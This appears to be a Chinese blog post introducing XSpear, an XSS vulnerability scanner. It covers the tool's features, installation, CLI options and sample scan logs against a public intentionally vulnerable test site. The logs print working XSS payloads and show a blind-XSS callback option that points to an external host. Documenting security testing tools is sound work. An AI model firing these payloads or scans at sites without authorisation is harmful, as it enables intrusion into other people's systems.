还在往各种输入框里提交 <script>alert(/xss/)</script> ?
有这功夫不如喝喝茶、划划水?
试试这款“X矛”吧,绝对会给你带来意想不到的收获。
XSpear
一个针对 XSS 的扫描器。
项目地址:https://github.com/hahwul/XSpear
顾名思义,一款基于 RubyGems 的 XSS 漏洞扫描器。能够进行常见的 XSS 扫描测试以及参数分析。
功能
- 基于模式匹配的XSS扫描
- alert confirm prompt 在无痕浏览器上检测事件(使用 Selenium)
- XSS保护绕过和反射参数的测试请求/响应
- 反射参数
- 所有参数(适用于 XSS 和 Anytings)
- 过滤测试 event handler HTML tag Special Char Useful code
- 测试 Blind XSS(使用 XSS Hunter,ezXSS,HBXSS,Etc 所有 url base 盲测...)
- 动态/静态分析
- 查找 SQL 错误模式
- 分析 Security 头(CSP HSTS X-frame-options,XSS-protection 等...)
- 分析其他头文件(服务器版本,内容类型等)
- XSS 测试到 URL 路径
- 从原始文件扫描(Burp 套件,ZAP 请求)
- XSpear 在 Ruby 代码上运行(带有 Gem 库)
- 显示 table base cli-report 和 filtered rule,testing raw query(url)
- 在所选参数上进行测试
- 支持输出格式 cli json
- cli:摘要,过滤规则(参数),原始查询
- 支持详细级别(0〜3)
- 0:相当模式(仅结果)
- 1:显示扫描状态(默认)
- 2:显示扫描日志
- 3:显示详细记录
- 支持自定义回调代码以测试各种攻击媒介
- 支持配置文件
安装(Linux下)
Gem 是一个管理 Ruby 库和程序的标准包,它通过 Ruby Gem 源来查找、安装、升级和卸载软件包,非常的便捷。
先安装依赖
$ gem install colorize
$ gem install selenium-webdriver
$ gem install terminal-table
$ gem install progress_bar
再进行安装
$ gem install XSpear
或者本地安装特定版本
下载地址:https://github.com/hahwul/XSpear/releases
再进行安装
$ gem install XSpear-1.3.1.gem
将此行添加到应用程序的Gemfile:
gem 'XSpear'
然后执行
$ bundle
CLI的用法
Usage: xspear -u [target] -[options] [value]
[ e.g ]
$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
[ Options ]
-u, --url=target_URL [required] Target Url
-d, --data=POST Body [optional] POST Method Body data
-a, --test-all-params [optional] test to all params(include not reflected)
--headers=HEADERS [optional] Add HTTP Headers
--cookie=COOKIE [optional] Add Cookie
--raw=FILENAME [optional] Load raw file(e.g raw_sample.txt)
-p, --param=PARAM [optional] Test paramters
-b, --BLIND=URL [optional] Add vector of Blind XSS
+ with XSS Hunter, ezXSS, HBXSS, etc...
+ e.g : -b https://hahwul.xss.ht
-t, --threads=NUMBER [optional] thread , default: 10
-o, --output=FORMAT [optional] Output format (cli , json)
-c, --config=FILENAME [optional] Using config.json
-v, --verbose=0~3 [optional] Show log depth
+ v=0 : quite mode(only result)
+ v=1 : show scanning status(default)
+ v=2 : show scanning logs
+ v=3 : show detail log(req/res)
-h, --help Prints this help
--version Show XSpear version
--update Show how to update
输出的结果类型
- (I)NFO:获取信息(例如sql错误,过滤规则,反映的参数等。)
- (V)UNL:易受攻击的XSS,已通过Selenium检查/警告/提示/确认
- (L)OW:低级别问题
- (M)EDIUM:中级问题
- (H)IGH:高级别问题
测试
[0]完全模式(仅显示结果)
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 0
[1]显示进度条(默认)
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 1
[*] analysis request..
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
[#######################################] [249/249] [100.00%] [01:05] [00:00] [ 3.83/s]
...
[2]显示扫描日志
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
[*] analysis request..
[I] [22:42:41] [200/OK] [param: cat][Found SQL Error Pattern]
[-] [22:42:41] [200/OK] 'STATIC' not reflected
[-] [22:42:41] [200/OK] 'cat' not reflected <script>alert(45)</script>
[I] [22:42:41] [200/OK] reflected rEfe6[param: cat][reflected parameter]
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
[I] [22:42:43] [200/OK] reflected onhwul=64[param: cat][reflected EHon{any} pattern]
[-] [22:42:54] [200/OK] 'cat' not reflected <img/src onerror=alert(45)>
[-] [22:42:54] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
[H] [22:42:54] [200/OK] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
[V] [22:42:59] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
...
[3]显示扫描详细日志
$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 3
[*] analysis request..
[-] [22:56:21] [200/OK] http://testphp.vulnweb.com/listproducts.php?cat=123 in url
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:53:23 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[-] [22:56:21] [200/OK] 'STATIC' not reflected
[-] [22:56:21] [200/OK] cat=123rEfe6 in url
...
[*] used test-reflected-params mode(default)
[*] creating a test query [for reflected 2 param + blind XSS ]
[*] test query generation is complete. [249 query]
[*] starting XSS Scanning. [10 threads]
...
[ Request ]
{"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
[ Response ]
{"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
[H] [22:57:33] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
...
案例测试
扫描XSS
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
输出 JSON
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
设定线程数
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
在所选参数下进行测试
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
在所有参数下测试
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
盲测 xss(所有参数)
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a
# Set your blind xss host. <-b options>
在 Burpsuite 上安装
请参考:
https://github.com/hahwul/XSpear/tree/master/forBurp
https://www.hahwul.com/2019/12/run-other-application-on-burp-suiteburp.html